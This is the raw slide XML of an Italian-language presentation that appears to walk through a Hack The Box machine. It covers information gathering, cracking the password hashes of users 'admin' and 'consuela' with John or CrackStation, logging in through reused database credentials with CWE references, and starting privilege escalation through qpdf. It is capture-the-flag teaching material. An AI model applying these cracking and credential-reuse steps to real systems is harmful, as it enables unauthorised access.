              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>prticolare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, ci sono admin e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>consuela</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene testo, schermata, Carattere&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE9CF488-0B8C-C9FF-1E0D-C28A549DFBC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5703930" y="544960"/>
            <a:ext cx="6446180" cy="3602426"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Immagine 3" descr="Immagine che contiene testo, schermata, Carattere, linea&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45D4F1E7-E729-9EE7-2BD2-B407669C296B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5689551" y="4514267"/>
            <a:ext cx="6460560" cy="1255447"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2593877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5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3" name="Freeform: Shape 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1517B3A5-1BB5-4C60-B65A-E4D6CA020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8" name="Group 57">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9" name="Straight Connector 58">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88">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1" name="Right Triangle 90">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968990"/>
            <a:ext cx="10611627" cy="1651379"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ct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577738" y="2893475"/>
            <a:ext cx="4914058" cy="3242577"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Ottenuto l’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> delle loro password procediamo con il cracking per risalire alla password originale. Per crackare la password possiamo usare Jhon oppure siti terzi che ci permettono di velocizzare. In questo caso sarà utilizzato: https://www.crackstation.net </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"/>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AFC8C4A6-18A1-1E55-487C-65AB57299E30}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="101607" y="3157253"/>
            <a:ext cx="6461820" cy="3424986"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1515216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Non è stato possibile recuperare la password dell’admin. In compenso possiamo sempre provare con consuela. </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"/>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ED250CE4-5AE1-FF37-C4C3-201B134A261D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5106333" y="1707985"/>
            <a:ext cx="6401443" cy="3456778"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="405325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a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Target Exploitation </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>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pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Non è stato possibile recuperare la password dell’admin. In compenso possiamo sempre provare con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>consuela</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>CWE-1391: Use of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Weak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Credentials</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> (4.14) - MITRE </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>CWE-522: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Insufficiently</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Protected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> Credentials </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Questa volta il cracking è andato a buon fine rivelando la password che risulta essere: </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>simple</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>clean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>” </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1100"/>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972196D0-F92A-2FD5-7ED2-89D12C510737}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5106333" y="1707985"/>
            <a:ext cx="6401443" cy="3456778"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="188278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663BDD8-36FC-48B0-8862-3B51BE4F7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C15A19D0-2BD2-47E7-A51B-B8083A14E7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F6641F14-42D8-42E0-8B56-FC0A08EB2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3FEF18-8973-49F1-B984-81E630730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FEE187-7ECD-4C55-BE26-0DA3DDE0E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708818-667C-4218-8552-2975EB0047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A1A626-67CE-4E24-974F-C432A21D1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029D28-01D8-4EB8-B30C-79D6F14E6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4E501C-EBFD-4E76-8F7F-9EFA76EFFD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4596B9-52A8-4717-8158-2204F86D9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EC080A-A9BB-467A-92A9-D597436B74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5DD030-3FCC-4380-B680-8E171845F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15E10D-03D4-4A67-8377-5B0A55F3D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B96670-ACA9-42B6-87A2-E411999899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BC8247-310E-48D0-9CEF-43BC6E41A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F09D0F-F86F-4AA5-AB1D-AAB1E5BA9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569AF0-6598-4FCC-803D-B3C3DE030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B68A9D-7921-44B8-8464-E36F028EEA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8EB3D7-2443-4764-9991-B691C090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6128C1-7748-441C-94E4-1874BB577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76682F-0434-4D7E-B400-2DF99D969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CD2F02B-2688-4DCD-9610-1C086528F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A0DA4B-915F-4A6D-8368-BE7B53E42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1711BC-8D96-4E1F-934B-9E382A617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64551E-CB94-4200-809A-9E33122BA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4389BE-74F0-4F54-9DE0-2BCB33C78F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721F72-5343-46B1-AFC1-6DF4FF771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4A528A6-14EE-4010-93CB-95F75CB96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186140D-084D-4621-A556-65927AB449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049A17-7EE3-4BEF-B630-AD0AB020E6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23B596-7D86-4AF3-AE7E-A696FEF11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7FC8FA-C1DE-4F38-BCDA-464A54783E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5BEFE2E-F050-46F9-BAD0-939F37AA9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63D6C682-FD57-4DF7-854F-DD140E1E29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2" y="1516213"/>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1"/>
            <a:ext cx="10325000" cy="1380515"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Target Exploitation </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Segnaposto contenuto 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F550568A-4416-391F-0738-9854D6D3A3E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2180492" y="2339974"/>
            <a:ext cx="6767894" cy="3794528"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1188720">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2340" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="4D322D"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Tramite le credenziali del database si è riusciti ad effettuare l’accesso sulla macchina locale in quanto utilizzava le stesse credenziali.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1800">
              <a:solidFill>
                <a:srgbClr val="4D322D"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene testo, Carattere, schermata&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4DBFDA6-73C5-591E-645C-BC7AF89075AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1809141" y="4054600"/>
            <a:ext cx="8087943" cy="2085703"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="417025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6F05C641-9A5C-5396-F36C-5521306D6797}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="691079" y="725952"/>
            <a:ext cx="4038652" cy="1881178"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>Information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Gathering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{592E982B-850B-B116-CB88-8AD223F0415C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="691079" y="2886117"/>
            <a:ext cx="4038652" cy="3276824"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Per la raccolta delle informazioni è stato necessario recarsi alla pagina della sfida su HTB e venire a conoscenza dei suoi IP e l’architettura Linux.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Immagine 3" descr="Immagine che contiene testo, schermata, Elementi grafici, Carattere&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D60B927-22E7-D8FF-974A-11CA79E2E6B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5106333" y="907804"/>
            <a:ext cx="6401443" cy="5057139"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3212196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7">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0" name="Rectangle 4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1" name="Picture 10" descr="One in a crowd">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3661D9E3-D57F-3961-CA60-AA37074313E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="8131" r="-2" b="16868"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="20" y="10"/>
            <a:ext cx="12191980" cy="6857989"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="52" name="Group 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A1F22E2-9813-4EBC-A701-AAAA6ED15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7F8B7518-BB87-4DEF-913D-A2C5C7E898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FA77DC-D6FA-4AF0-A95F-D85CBE0CE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31CC20-67CB-426B-9FFC-86FBB5EA6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16F19F-AFAD-4BB8-BADC-94042BA78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21872D-2D68-4EB1-A577-7F00EF355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199ACF-202D-4583-B640-4C058ED56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BC0596-61D3-4355-A982-C094F43CB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51CA5D-B2E2-4379-B91C-7B20CCE96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794494-F766-402C-9809-2B7281C26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4BC5DD-5792-4415-B452-36FC7DB9D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D5BC48-7901-4D5B-AD85-A6FCC73C2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7ABEFD0-8063-4DE5-9CA3-737A67750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AA24B3D-8D0A-479A-B1D0-06EF71D6F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56DE0E-53B5-4582-80B2-722B3BC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883FE8-A185-4697-8586-55EED58A5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8896C73-323B-4B40-8CA7-A60CB0C668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F23969-C27D-45AA-837C-C07705B0AD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3FEA341-5A10-448E-A0F8-6D0718B852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1EE197-BD9A-4965-84E0-BB65569A7D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6FCEBE5-19AB-4C9B-8AC6-78A104965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E1E700-F8E3-4452-95DE-C8B0FE50A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C295082-1371-47D6-A2AB-35BE9A7F28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1A10ADB-4739-4067-852F-DFA06CC8EC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406801A-B91F-4D65-8E7B-2273ADD21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62C9FE0-C4B7-41D4-B2F5-B9C177CCBB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487A2F-0D93-4B96-A88E-A7C3050D62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4C9A55-5148-43BC-9F3C-1EA2B7BC5D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8B2033D-57C6-4263-BCBC-4F717C962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1D041FE-8BBF-4472-9BA9-274FF791E2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F09DF04-1192-4720-BC8C-10F3AA1C44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4BB435-2932-44F7-AC2E-D5A16116EB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Freeform: Shape 84">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{445FE972-3FD1-42A0-917A-5FC226BB7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3657600"/>
            <a:ext cx="12198214"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5" y="4453656"/>
            <a:ext cx="10325635" cy="975150"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400"/>
              <a:t>Privilege Escalation </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27577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0" y="20590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721945"/>
            <a:ext cx="10611627" cy="1916619"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t> Escalation </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:ea typeface="+mj-lt"/>
              <a:cs typeface="+mj-lt"/>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8" y="2893475"/>
            <a:ext cx="4981486" cy="3242577"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1300">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Entrati ora nella macchina non ci resta altro che effettuare l’elevazione dei privilegi. </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1300"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1300" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Una buona pratica è ricercare qualche comando che può essere di nostro interesse quindi andiamo ad effettuare una “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1300" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1300" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -la /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1300" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1300" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>/bin”. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="B68E7B"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1300">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Tra questi comandi troviamo “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1300" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>qpdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1300">
